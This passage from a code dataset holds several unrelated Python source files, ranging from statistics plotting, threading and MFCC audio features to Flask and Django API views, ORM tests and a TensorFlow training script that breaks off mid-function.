'input', 'likelihood'])\n #pd.DataFrame(columns=['theta', 'input', 'likelihood'])\n for data in dataset:\n xv, yv = np.meshgrid(data, theta)\n specific_likelihood = likelihood(xv, yv, axis=1)\n\n input_string = [f'γ = {data}']*len(theta)\n likelihood_df = pd.DataFrame(list(zip(theta, input_string, specific_likelihood)),\n columns=['theta', 'input', 'likelihood'])\n likelihoods = likelihoods.append(likelihood_df, ignore_index=True)\n\n sns.lineplot(x='theta', y='likelihood', hue='input', data=likelihoods)\n sns.despine()\n plt.title('Likelihoods using normal likelihood function')\n plt.xlabel('θ')\n plt.ylabel('Likelihood')\n\n return log_probabilities\n\ndef point_5(a=1, b=1):\n theta = np.linspace(0, 1, 101)\n beta_prior = stats.beta.pdf(theta, a, b)\n print(np.max(beta_prior))\n\n dataset = [[1], [1, 1], [1, 1, 0, 1]]\n theta = np.linspace(0, 1, 101)\n probabilities = pd.DataFrame(columns=['theta', 'input', 'probability'])\n #pd.DataFrame(columns=['theta', 'input', 'likelihood'])\n for data in dataset:\n xv, yv = np.meshgrid(data, theta)\n specific_probability = likelihood(xv, yv, axis=1) * beta_prior / np.trapz(likelihood(xv, yv, axis=1) * beta_prior) / (theta[1] - theta[0])\n\n input_string = [f'γ = {data}']*len(theta)\n probability = pd.DataFrame(list(zip(theta, input_string, specific_probability)),\n columns=['theta', 'input', 'probability'])\n probabilities = probabilities.append(probability, ignore_index=True)\n\n sns.lineplot(x='theta', y='probability', hue='input', data=probabilities)\n sns.despine()\n plt.title(f'Probability without logs. a = {a}, b = {b}.')\n plt.xlabel('θ')\n plt.ylabel('Probability')\n\ndef point_5_log(a=1, b=1):\n theta = np.linspace(0, 1, 101)\n beta_prior = stats.beta.pdf(theta, a, b)\n\n dataset = [[1], [1, 1], [1, 1, 0, 1]]\n theta = np.linspace(0, 1, 101)\n probabilities = pd.DataFrame(columns=['theta', 'input', 'probability'])\n #pd.DataFrame(columns=['theta', 'input', 'likelihood'])\n for data in dataset:\n xv, yv = np.meshgrid(data, theta)\n specific_probability = 10**(log_likelihood(xv, yv, axis=1) + np.log10(beta_prior)) / np.trapz(10**(log_likelihood(xv, yv, axis=1) + np.log10(beta_prior))) / (theta[1] - theta[0])\n\n input_string = [f'γ = {data}']*len(theta)\n probability = pd.DataFrame(list(zip(theta, input_string, specific_probability)),\n columns=['theta', 'input', 'probability'])\n probabilities = probabilities.append(probability, ignore_index=True)\n\n sns.lineplot(x='theta', y='probability', hue='input', data=probabilities)\n sns.despine()\n plt.title(f'Probability with logs. a = {a}, b = {b}.')\n plt.xlabel('θ')\n plt.ylabel('Probability')\n\ndef main():\n point_2()\n plt.show()\n plt.figure()\n point_3()\n plt.show()\n plt.figure()\n point_4()\n plt.figure()\n point_5(1,1)\n plt.figure()\n point_5_log(1,1)\n plt.figure()\n point_5(2,2)\n plt.figure()\n point_5(3, 1)\n plt.figure()\n point_5(4, 2)\n plt.figure()\n point_5(15, 5)\n plt.show()\n\nif __name__ == '__main__':\n main()\n","sub_path":"03-assignment/B-task.py","file_name":"B-task.py","file_ext":"py","file_size_in_byte":5255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"252129130","text":"#!/usr/bin/env python3.6\n# coding: utf-8\n#waitingforsunthreading.PY\n# Created on 2018/4/9\n# @author: zhaoyun\n\"\"\"\ndescription:子线程执行过程中锁定,执行完成后和主线程共享cpu资源,当满足条件时候,子线程又会执行直到完成\n然后子主线程一起共享资源,一直这样循环下去,直到主线程结束,所有线程结束\n\"\"\"\nfrom threading import Thread ,Event,Lock\nimport time\nlock:Lock = Lock()\ndef add():\n count =1\n while True:\n # time.sleep(3)\n if count%200 ==0:\n lock.acquire()\n print(\"rrrrr\")\n time.sleep(2)\n print(\"wwwwww\",count)\n lock.release()\n count += 1\nt = Thread(target=add)\nt.setDaemon(True)\nt.start()\n\ntime.sleep(2)\nprint( \"iam maiN threading start\")\ntime.sleep(10)\nprint(\"iam main threading end\")\n","sub_path":"demoforsuning/waitingforsunthreading.py","file_name":"waitingforsunthreading.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"84957486","text":"import os\n\nno = [\"tabletop.png\", \"resize.py\", \"README.md\", \"sounds\"]\n\nfilename_map = {\n \"h\": \"Hearts\",\n \"d\": \"Diamonds\",\n \"c\": \"Clubs\",\n \"s\": \"Spades\",\n}\n\nvalue_map = {\n 1: \"A\",\n 11: \"J\",\n 12: \"Q\",\n 13: \"K\",\n}\n\nimages = os.listdir()\n\nfor i in images:\n if i.startswith('.'):\n continue\n\n if i not in no:\n value = int(i[1:-4])\n if value == 1 or value > 10:\n value = value_map[value]\n filename = filename_map[i[0:1]] + str(value) + \".png\"\n os.system(f\"convert {i} -resize 80x111\\> {filename}\")\n","sub_path":"resize/resize.py","file_name":"resize.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"301636595","text":"#동일한 클래스에서 여러개의 객체가 발생한경우\n#멤버데이터는 메모리별도로\n#멤버함수(코드) 는 공유\n#어떻게 각각의 멤버데이터 영역에 R/w self\n\nclass Test:\n def __init__(self): #생성자\n self.a = 10\n self.b = 20\n def setData(self,x,y):\n print('self id:', id(self))\n self.a = x\n self.b = y\n def show(self):\n print('show id', id(self) )\n print(self.a, self.b)\n\nobj = Test() # obj.__init__(obj)\nprint(\"obj id:\", id(obj) )\nobj.setData(1,2) #obj.setData(obj,1,2)\nobj.show() #obj.show(obj)\n\nobj1 = Test() # obj1.__init__(obj1)\nprint(\"obj1 id:\", id(obj1) )\nobj1.setData(11,22) #obj1.setData(obj1,11,22)\nobj1.show()#obj1.show(obj1)\n\n\n\n\n\n\n\n","sub_path":"Python/pythonTest_class/PythonClass/lecTest/classTest1.py","file_name":"classTest1.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"654533514","text":"# Author: Danny Milsom \n# Copyright (C) 2014 CGI IT UK Ltd\n\nfrom trac.db import Table, Column, DatabaseManager\n\nschema = [\n Table('project_message')[\n Column('name'),\n Column('message'),\n Column('button'),\n Column('mode'),\n Column('groups'),\n Column('start', type='int64'),\n Column('end', type='int64'),\n Column('author'),\n Column('created_at', type='int64'),\n ],\n Table('project_message_record')[\n Column('record_id', auto_increment=True),\n Column('message_name'),\n Column('agreed_by'),\n Column('agreed_at', type='int64'),\n ]\n ]\n\ndef do_upgrade(env, i, cursor):\n cursor.execute(\"\"\"CREATE TEMPORARY TABLE termsofservice_old \n AS SELECT * FROM termsofservice\"\"\")\n cursor.execute(\"\"\"CREATE TEMPORARY TABLE termsofservice_record_old\n AS SELECT * FROM termsofservice_record\"\"\")\n cursor.execute(\"DROP TABLE termsofservice\")\n cursor.execute(\"DROP TABLE termsofservice_record\")\n\n db_connector, _ = DatabaseManager(env)._get_connector()\n for table in schema:\n for statement in db_connector.to_sql(table):\n cursor.execute(statement)\n\n cursor.execute(\"\"\"INSERT into project_message (name, message, button, mode, groups, start, \"end\", author, created_at)\n SELECT name, message, button, mode, NULL, NULL, NULL, author, \"date\" FROM termsofservice_old\"\"\")\n cursor.execute(\"\"\"INSERT into project_message_record (message_name, agreed_by, agreed_at)\n SELECT name, user, time FROM termsofservice_record_old\"\"\")\n cursor.execute('DROP TABLE termsofservice_old')\n cursor.execute('DROP TABLE termsofservice_record_old')\n\n cursor.execute(\"\"\"UPDATE system\n SET name='projectmessage_schema'\n WHERE name='termsofservice_schema'\n \"\"\")\n","sub_path":"projectmessage/upgrades/db2.py","file_name":"db2.py","file_ext":"py","file_size_in_byte":1931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"297826337","text":"import numpy as np\nimport librosa\nfrom scipy.fftpack import dct\n\nimport stft\n\n\ndef hz2mel(f, f0=1000):\n m0 = 1000 / np.log(1000/f0 + 1)\n return m0*np.log(f/f0 + 1)\n\n\ndef mel2hz(m, f0=1000):\n m0 = 1000 / np.log(1000/f0 + 1)\n return f0*(np.exp(m/m0) - 1)\n\n\ndef mel_filter_bank(sr, data_size, bank_size):\n mel_max = hz2mel(sr/2)\n\n n_max = data_size//2\n\n df = sr/data_size\n\n dmel = mel_max/(bank_size+1)\n mel_centers = np.arange(1, bank_size+1) * dmel\n f_centers = mel2hz(mel_centers)\n\n idx_centers = np.round(f_centers / df)\n start_idx = np.hstack(([0], idx_centers[0:bank_size - 1]))\n end_idx = np.hstack((idx_centers[1:bank_size], [n_max]))\n\n filter_bank = np.zeros((bank_size, n_max))\n for c in range(0, bank_size):\n inc = 1./(idx_centers[c]-start_idx[c])\n for i in np.arange(start_idx[c], idx_centers[c]):\n filter_bank[c, int(i)] = (i-start_idx[c])*inc\n\n dec = 1./(end_idx[c] - idx_centers[c])\n for i in np.arange(idx_centers[c], end_idx[c]):\n filter_bank[c, int(i)] = 1.0 - ((i - idx_centers[c]) * dec)\n\n return filter_bank, f_centers\n\n\ndef get_mfcc(input, sr, win_size, overlap, bank_size):\n spec = stft.faster_stft(input, win_size, overlap)[:win_size//2]\n filter_bank, _ = mel_filter_bank(sr, win_size, bank_size)\n mel_spec = np.dot(filter_bank, spec)\n mel_spec_db = librosa.amplitude_to_db(mel_spec)\n ceps = dct(mel_spec_db, axis=0)\n mfcc = ceps[:13]\n\n return mfcc\n\n\ndef calc_delta(X, width=2):\n # X = np.pad(X, ((0,0), (width+1, width+1)), 'edge')\n\n k = np.arange(-width, width+1)\n _sum = np.sum(k**2)\n\n comp = []\n for i in range(width, X.shape[1]+width):\n try:\n comp.append(np.sum(k*X[:, i-width:i+width+1], axis=1))\n except ValueError:\n break\n comp = np.array(comp).T\n\n delta = comp/_sum\n\n return delta\n","sub_path":"ex_5/kajiwara/mfcc.py","file_name":"mfcc.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"214844284","text":"# -*- coding: utf-8 -*-\n#\n# Copyright (C) 2019 CERN.\n#\n# CDS Books is free software; you can redistribute it and/or modify it under\n# the terms of the MIT License; see LICENSE file for more details.\n\n\"\"\"Pytest fixtures and plugins for the API application.\"\"\"\n\nfrom __future__ import absolute_import, print_function\n\nimport pytest\nfrom invenio_app.factory import create_api\n\nfrom invenio_app_ils.internal_locations.api import INTERNAL_LOCATION_PID_TYPE # noqa isort:skip\nfrom invenio_app_ils.internal_locations.api import InternalLocation # noqa isort:skip\n\n\n@pytest.fixture(scope='module')\ndef create_app():\n \"\"\"Create test app.\"\"\"\n return create_api\n\n\n@pytest.fixture(scope='module')\ndef app_config(app_config):\n \"\"\"Get app config.\"\"\"\n app_config[\"APP_ALLOWED_HOSTS\"] = [\"localhost\"]\n app_config[\"CELERY_TASK_ALWAYS_EAGER\"] = True\n app_config[\"JSONSCHEMAS_SCHEMAS\"] = [\n \"acquisition\",\n \"document_requests\",\n \"documents\",\n \"eitems\",\n \"ill\",\n \"internal_locations\",\n \"items\",\n \"invenio_opendefinition\",\n \"invenio_records_files\",\n \"loans\",\n \"locations\",\n \"series\",\n \"vocabularies\",\n ]\n return app_config\n","sub_path":"tests/api/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"473465897","text":"# -*- coding: utf-8 -*-\nfrom tento.music import Artist, Album, Genre, Music, Position\n\n\ndef test_create_artist(f_session):\n name = 'Adele'\n artist = Artist(name=name)\n f_session.add(artist)\n f_session.commit()\n artist = f_session.query(Artist)\\\n .filter(Artist.name == name)\\\n .all()\n assert artist\n assert artist[0].created_at\n assert name == artist[0].name\n\n\ndef test_create_album(f_session, f_artist):\n name = '21'\n year = 2008\n album = Album(name=name,\n artist_id=f_artist.id,\n year=year)\n f_session.add(album)\n f_session.commit()\n album = f_session.query(Album)\\\n .join(Album.artist)\\\n .filter(Album.name == name)\\\n .first()\n assert album\n assert album.created_at\n assert name == album.name\n assert f_artist.id == album.artist_id\n assert year == album.year\n assert f_artist.id == album.artist.id\n assert f_artist.name == album.artist.name\n assert f_artist.created_at == album.artist.created_at\n\n\ndef test_create_genre(f_session):\n name = 'pop'\n genre = Genre(name=name)\n f_session.add(genre)\n f_session.commit()\n genre = f_session.query(Genre)\\\n .filter(Genre.name == name)\\\n .all()\n assert genre\n assert genre[0].created_at\n assert name == genre[0].name\n\n\ndef test_create_music(f_session, f_album, f_genre):\n name = 'Someone Like You'\n track_number = 1\n disc_number = 1\n music = Music(name=name,\n album=f_album,\n genre=f_genre,\n track_number=track_number,\n disc_number=disc_number)\n f_session.add(music)\n f_session.commit()\n music = f_session.query(Music)\\\n .filter(Music.name == name)\\\n .first()\n assert music\n assert music.created_at\n assert name == music.name\n assert f_album.id == music.album_id\n assert track_number == music.track_number\n assert disc_number == music.disc_number\n assert f_album.id == music.album.id\n assert f_album.name == music.album.name\n assert f_genre.name == music.genre.name\n\ndef test_create_position(f_session, f_music):\n music_id = 1\n position = Position(x=10, y=9, music_id=music_id)\n f_session.add(position)\n f_session.commit()\n position = f_session.query(Position)\\\n .filter(Position.id == f_music.id)\\\n .first()\n assert position\n assert position.created_at\n assert 10 == position.x\n assert 9 == position.y\n assert music_id == position.music_id\n","sub_path":"tests/test_music.py","file_name":"test_music.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"441638049","text":"#!/usr/bin/env python3\nimport gc\nimport weakref\n\n\nclass ExpensiveObject(object):\n def __init__(self, name):\n self.name = name\n\n def __del__(self):\n print(\"(Deleting {})\".format(self))\n\n\nobj = ExpensiveObject(\"obj\")\np = weakref.proxy(obj)\n\nprint(\"BEFORE:\", p.name)\nobj = None\nprint(\"AFTER:\", p.name)","sub_path":"language_tools/_exceptions/exceptions_referenceerror.py","file_name":"exceptions_referenceerror.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"556476682","text":"#!/usr/bin/python\n\"\"\"\nCopyright (c) 2015 by Lilee Technology, Ltd.\nAll rights reserved.\n\nerc_job_producer.py\n\nPython module to create two kinds of job for erc to execute:\n1. 5502 on-demand CHMM log job\n2. Periodic CHMM log job\n\n\"\"\"\n\nimport os\nimport re\nimport copy\nimport threading\nimport time\nimport datetime\n\n\nfrom logger import Logger\n\n\nclass PeriodicJob(object):\n def __init__(self, job_type, log_period):\n self.type = job_type\n self.log_period = log_period\n self.seq_num = 0\n Logger.info(\"PeriodicJob\", 'New job:' + job_type + ' Log period:' + str(log_period))\n\n\nclass PeriodicJobsProducer(threading.Thread):\n \"\"\"\n Produce periodic log request to jobs queue.\n Period = every x mins = log_period, this values comes from lilee-erc.cfg file\n \"\"\"\n def __init__(self, jobs_queue, config_attr):\n threading.Thread.__init__(self)\n self.jobs_queue = jobs_queue\n self.log_period = config_attr[\"log_period\"]\n if not os.path.exists(config_attr[\"log_path\"]):\n Logger.error(\"PeriodicJobsProducer\", \"Log repository not found: \" + config_attr[\"log_path\"])\n os.mkdir(config_attr[\"log_path\"])\n\n def run(self):\n\n while True:\n self.jobs_queue.put(PeriodicJob('recent', self.log_period))\n Logger.info(\"PeriodicJobsProducer\", \"Put job in the queue, #: \" + str(self.jobs_queue.qsize()))\n time.sleep(int(self.log_period))\n\n\nclass OnDemandJob(object):\n def __init__(self, job_type, start_time, end_time, seq_num, ondemand_file_name):\n self.type = job_type\n self.start_time = start_time\n self.end_time = end_time\n self.seq_num = seq_num\n self.ondemand_file_name = ondemand_file_name\n Logger.info(\"OnDemandJob\", ' Start time:' + str(self.start_time) +\n ' End time:' + str(self.end_time))\n return\n\n # def add_retry_count(self):\n # self.retry_count += 1\n # return\n\n\nclass OnDemandJobsProducer(threading.Thread):\n \"\"\"\n Produce on-demand log request to jobs queue.\n Request comes from Lilee SMA in a .req file format (RequestTime_LogStartTime_LogEndTime_MsgSeqNum.req)\n \"\"\"\n def __init__(self, jobs_queue, config_attr):\n threading.Thread.__init__(self)\n self.jobs_queue = jobs_queue\n self.config_attr = config_attr\n if not os.path.exists(config_attr[\"ondemand_req_path\"]):\n os.mkdir(config_attr[\"ondemand_req_path\"])\n\n def run(self):\n while True:\n try:\n Logger.info(\"OnDemandJobsProducer.run\", \"Check on demand req \" +\n str(self.config_attr[\"ondemand_chk_period\"]) + \" sec\")\n list_onDemand_jobs = self.check_onDemand_req()\n if list_onDemand_jobs:\n for onDemand_job in list_onDemand_jobs:\n self.jobs_queue.put(onDemand_job)\n time.sleep(int(self.config_attr[\"ondemand_chk_period\"]))\n except Exception as e:\n Logger.error(\"OnDemandJobsProducer.run\", str(e))\n\n def check_onDemand_req(self):\n \"\"\"\n This function is called to check on-demand request\n valid request is a file come from Lilee-SMA with name format: RequsetTime_LogStartTime_LogEndTime_MsgSeqNum.req\n Args:\n Returns:\n List of sorted onDemand jobs\n \"\"\"\n list_onDemand_jobs = []\n try:\n for file_name in os.listdir(self.config_attr[\"ondemand_req_path\"]):\n file_name_new = re.search(r'^([0-9]{10})_([0-9]{10})_([0-9]{10})_([0-9]*)\\.req$', file_name)\n if file_name_new is not None:\n start_time_ux = file_name_new.group(2)\n start_time = datetime.datetime.fromtimestamp(int(start_time_ux)).strftime('%m/%d/%Y %H:%M:%S')\n end_time_ux = file_name_new.group(3)\n end_time = datetime.datetime.fromtimestamp(int(end_time_ux)).strftime('%m/%d/%Y %H:%M:%S')\n seq_num = int(file_name_new.group(4))\n ondemand_job = OnDemandJob(\"batch\", start_time, end_time, seq_num, file_name)\n list_onDemand_jobs.append(copy.copy(ondemand_job))\n os.rename(self.config_attr[\"ondemand_req_path\"] +\n file_name, self.config_attr[\"ondemand_req_path\"] + file_name + \".q\")\n Logger.info(\"OnDemandJobsProducer.check_onDemand_req\", \"Add on-demand job: \" + str(start_time) +\n \" - \" + str(end_time) + \", \" + str(seq_num))\n except Exception as e:\n Logger.error(\"OnDemandJobsProducer.check_onDemand_req\", str(e))\n finally:\n sorted(list_onDemand_jobs, key=self.get_sort_key)\n if len(list_onDemand_jobs) > 0:\n Logger.info(\"OnDemandJobsProducer.check_onDemand_req\", str(list_onDemand_jobs[0].seq_num))\n return list_onDemand_jobs\n\n def get_sort_key(self, ondemand_job):\n return int(ondemand_job.seq_num)\n","sub_path":"src/erc_job_producer.py","file_name":"erc_job_producer.py","file_ext":"py","file_size_in_byte":4627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"108081767","text":"if __name__ == '__main__':\n import argparse\n from .tools import aviation_weather\n PARSER = argparse.ArgumentParser(description='Get metars or tafs for the specified stations')\n PARSER.add_argument('--hours-before-now', required=False, default=24,\n help='hours before now')\n PARSER.add_argument('--most-recent', '-r', required=False, default=True, action='store_true',\n help='Only return most recent metars or tafs for the stations')\n PARSER.add_argument('data_source', choices=['metars', 'tafs'])\n PARSER.add_argument('--text', '-t', required=False, default=True, action='store_true',\n help='display in human-readable text format')\n PARSER.add_argument('stations', nargs='+',\n help='station code or short code for multiple stations')\n ARGS = PARSER.parse_args()\n STATIONS = ','.join(ARGS.stations)\n RESULT = aviation_weather(ARGS.data_source, STATIONS,\n ARGS.hours_before_now, ARGS.most_recent,\n ARGS.text)\n if ARGS.text:\n print(RESULT)\n elif len(RESULT) > 0:\n print('\\n'.join(RESULT))\n else:\n raise ValueError(\"Error encountered outputting results.\")\n","sub_path":"aviation_weather/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"4655336","text":"from flask import request, jsonify\nimport json\nfrom . import user_api\nfrom ...models.User import UserModel, user_schema\nfrom ...Middleware.JWTToken import JWTToken\nfrom .response import user_response\nfrom ...shared.EmailService import EmailService\n\n@user_api.route('', methods=['POST'])\ndef create_user():\n \"\"\"\n Create a user\n \"\"\"\n user_data = request.get_json()\n data, error = user_schema.load(user_data)\n \n if error:\n return user_response(error, 400)\n \n # check if user already exist\n find_user = UserModel.query.filter((UserModel.email==data.get('email')) | (UserModel.phone_number==data.get('phone_number'))).first()\n \n if find_user:\n return user_response({'error': 'User already exist, please use a different email or phone number'}, 400)\n \n user = UserModel(data)\n user.save()\n response = user_schema.dump(user).data\n # generate token using user id as paylaod\n token = JWTToken.generate_token(response.get('id'))\n \n # send email activation to user\n recipient_email = response.get('email')\n activation_token = JWTToken.generate_token(recipient_email)\n EmailService.send_account_activation_email(activation_token, recipient_email)\n\n return user_response({'token': token}, 201)\n","sub_path":"src/Views/UserView/create.py","file_name":"create.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"372869854","text":"from django.conf import settings\n\nfrom rest_framework.decorators import api_view\n\nfrom common.helpers import PrettyJsonResponse as JsonResponse\n\nfrom .models import Lock, Course, Depts, ModuleA, ModuleB\n\nfrom .app_helpers import get_student_timetable, get_custom_timetable\n\nfrom common.decorators import uclapi_protected_endpoint\n\n_SETID = settings.ROOMBOOKINGS_SETID\n\n\n@api_view([\"GET\"])\n@uclapi_protected_endpoint(personal_data=True, required_scopes=['timetable'])\ndef get_personal_timetable(request, *args, **kwargs):\n token = kwargs['token']\n user = token.user\n try:\n date_filter = request.GET[\"date_filter\"]\n timetable = get_student_timetable(user.employee_id, date_filter)\n except KeyError:\n timetable = get_student_timetable(user.employee_id)\n\n response = {\n \"ok\": True,\n \"timetable\": timetable\n }\n return JsonResponse(response, rate_limiting_data=kwargs)\n\n\n@api_view([\"GET\"])\n@uclapi_protected_endpoint()\ndef get_modules_timetable(request, *args, **kwargs):\n module_ids = request.GET.get(\"modules\")\n if module_ids is None:\n return JsonResponse({\n \"ok\": False,\n \"error\": \"No module IDs provided.\"\n }, rate_limiting_data=kwargs)\n\n try:\n modules = module_ids.split(',')\n except ValueError:\n return JsonResponse({\n \"ok\": False,\n \"error\": \"Invalid module IDs provided.\"\n }, rate_limiting_data=kwargs)\n\n try:\n date_filter = request.GET[\"date_filter\"]\n custom_timetable = get_custom_timetable(modules, date_filter)\n except KeyError:\n custom_timetable = get_custom_timetable(modules)\n\n if custom_timetable:\n response_json = {\n \"ok\": True,\n \"timetable\": custom_timetable\n }\n return JsonResponse(response_json, rate_limiting_data=kwargs)\n else:\n response_json = {\n \"ok\": False,\n \"error\": \"One or more invalid Module IDs supplied.\"\n }\n response = JsonResponse(response_json, rate_limiting_data=kwargs)\n response.status_code = 400\n return response\n\n\n@api_view([\"GET\"])\n@uclapi_protected_endpoint()\ndef get_departments(request, *args, **kwargs):\n \"\"\"\n Returns all departments at UCL\n \"\"\"\n depts = {\"ok\": True, \"departments\": []}\n for dept in Depts.objects.all():\n depts[\"departments\"].append({\n \"department_id\": dept.deptid,\n \"name\": dept.name\n })\n return JsonResponse(depts, rate_limiting_data=kwargs)\n\n\n@api_view([\"GET\"])\n@uclapi_protected_endpoint()\ndef get_department_courses(request, *args, **kwargs):\n \"\"\"\n Returns all the courses in UCL with relevant ID\n \"\"\"\n try:\n department_id = request.GET[\"department\"]\n except KeyError:\n response = JsonResponse({\n \"ok\": False,\n \"error\": \"Supply a Department ID using the department parameter.\"\n }, rate_limiting_data=kwargs)\n response.status_code = 400\n return response\n\n courses = {\"ok\": True, \"courses\": []}\n for course in Course.objects.filter(owner=department_id, setid=_SETID):\n courses[\"courses\"].append({\n \"course_name\": course.name,\n \"course_id\": course.courseid,\n \"years\": course.numyears\n })\n return JsonResponse(courses, rate_limiting_data=kwargs)\n\n\n@api_view([\"GET\"])\n@uclapi_protected_endpoint()\ndef get_department_modules(request, *args, **kwargs):\n \"\"\"\n Returns all modules taught by a particular department.\n \"\"\"\n try:\n department_id = request.GET[\"department\"]\n except KeyError:\n response = JsonResponse({\n \"ok\": False,\n \"error\": \"Supply a Department ID using the department parameter.\"\n }, rate_limiting_data=kwargs)\n response.status_code = 400\n return response\n\n modules = {\"ok\": True, \"modules\": []}\n lock = Lock.objects.all()[0]\n m = ModuleA if lock.a else ModuleB\n for module in m.objects.filter(owner=department_id, setid=_SETID):\n modules[\"modules\"].append({\n \"module_id\": module.moduleid,\n \"name\": module.name,\n \"module_code\": module.linkcode,\n \"class_size\": module.csize\n })\n\n return JsonResponse(modules, rate_limiting_data=kwargs)\n","sub_path":"backend/uclapi/timetable/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"137133408","text":"# Copyright 2016 Stanford University\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport math\nimport os\nimport sys\nimport time\nimport random\nimport json\nfrom os.path import join as pjoin\n\nimport numpy as np\nfrom six.moves import xrange\nimport tensorflow as tf\n\nimport model_concat\nfrom flag import FLAGS\nfrom data_generate import pair_iter, id2char\n\nimport logging\nlogging.basicConfig(level=logging.INFO)\n\n\ndef create_model(session, vocab_size_char, vocab_size_word):\n model = model_concat.Model(FLAGS.size, FLAGS.num_wit, FLAGS.num_layers,\n FLAGS.max_gradient_norm, FLAGS.learning_rate,\n FLAGS.learning_rate_decay_factor, forward_only=False,\n optimizer=FLAGS.optimizer)\n model.build_model(vocab_size_char, model=FLAGS.model,\n flag_bidirect=FLAGS.flag_bidirect, model_sum=FLAGS.flag_sum)\n ckpt = tf.train.get_checkpoint_state(FLAGS.train_dir)\n num_epoch = 0\n if ckpt:\n logging.info(\"Reading model parameters from %s\" % ckpt.model_checkpoint_path)\n model.saver.restore(session, ckpt.model_checkpoint_path)\n num_epoch = int(ckpt.model_checkpoint_path.split('-')[1])\n print (num_epoch)\n else:\n logging.info(\"Created model with fresh parameters.\")\n session.run(tf.global_variables_initializer())\n logging.info('Num params: %d' % sum(v.get_shape().num_elements() for v in tf.trainable_variables()))\n return model, num_epoch\n\n\ndef validate(model, sess, cur_len):\n valid_costs, valid_lengths = [], []\n for source_tokens, source_mask, target_tokens in pair_iter(FLAGS.data_dir,\n FLAGS.dev, FLAGS.num_wit,\n cur_len=cur_len,\n num_top=FLAGS.num_top,\n max_seq_len=FLAGS.max_seq_len,\n data_random=FLAGS.random,\n batch_size=FLAGS.batch_size,\n prior=FLAGS.prior,\n prob_high=FLAGS.prob_high,\n prob_in=FLAGS.prob_in,\n flag_generate=FLAGS.flag_generate,\n prob_back=FLAGS.prob_back):\n cost = model.test(sess, source_tokens, source_mask, target_tokens)\n valid_costs.append(cost * source_mask.shape[1])\n valid_lengths.append(np.sum(source_mask))\n valid_cost = sum(valid_costs) / float(sum(valid_lengths))\n return valid_cost\n\n\ndef train():\n \"\"\"Train a translation model using NLC data.\"\"\"\n # Prepare NLC data.\n logging.info(\"Get NLC data in %s\" % FLAGS.data_dir)\n vocab_size = len(id2char)\n logging.info(\"Vocabulary size: %d\" % vocab_size)\n if not os.path.exists(FLAGS.train_dir):\n os.makedirs(FLAGS.train_dir)\n file_handler = logging.FileHandler(\"{0}/log.txt\".format(FLAGS.train_dir))\n logging.getLogger().addHandler(file_handler)\n # with open(os.path.join(FLAGS.train_dir, \"flags.json\"), 'w') as fout:\n # json.dump(FLAGS.__flags, fout)\n with tf.Session() as sess:\n logging.info(\"Creating %d layers of %d units.\" % (FLAGS.num_layers, FLAGS.size))\n model, epoch = create_model(sess, vocab_size, False)\n\n if False:\n tic = time.time()\n params = tf.trainable_variables()\n num_params = sum(map(lambda t: np.prod(tf.shape(t.value()).eval()), params))\n toc = time.time()\n print (\"Number of params: %d (retreival took %f secs)\" % (num_params, toc - tic))\n\n best_epoch = epoch\n best_cost = float('inf')\n previous_losses = []\n exp_cost = None\n exp_length = None\n exp_norm = None\n total_iters = 0\n start_time = time.time()\n cur_len = -2\n # if epoch >= 1:\n # if FLAGS.flag_varlen:\n # best_cost = validate(model, sess, epoch)\n # else:\n # best_cost = validate(model, sess, cur_len - 1)\n\n while (FLAGS.epochs == 0 or epoch < FLAGS.epochs):\n epoch += 1\n current_step = 0\n\n ## Train\n epoch_tic = time.time()\n if FLAGS.flag_varlen:\n cur_len = epoch - 1\n\n print('epoch', epoch, cur_len)\n for source_tokens, source_mask, target_tokens in pair_iter(FLAGS.data_dir, 'train',\n FLAGS.num_wit,\n cur_len=cur_len,\n num_top=FLAGS.num_top,\n max_seq_len=FLAGS.max_seq_len,\n batch_size=FLAGS.batch_size,\n data_random=FLAGS.random,\n prior=FLAGS.prior,\n prob_high=FLAGS.prob_high,\n prob_in=FLAGS.prob_in,\n flag_generate=FLAGS.flag_generate,\n prob_back=FLAGS.prob_back,\n sort_and_shuffle=True):\n # Get a batch and make a step.\n tic = time.time()\n grad_norm, cost, param_norm = model.train(sess, source_tokens, source_mask, target_tokens, FLAGS.keep_prob)\n toc = time.time()\n iter_time = toc - tic\n total_iters += np.sum(source_mask)\n tps = total_iters / (time.time() - start_time)\n current_step += 1\n print('iter', current_step)\n lengths = np.sum(source_mask, axis=0)\n mean_length = 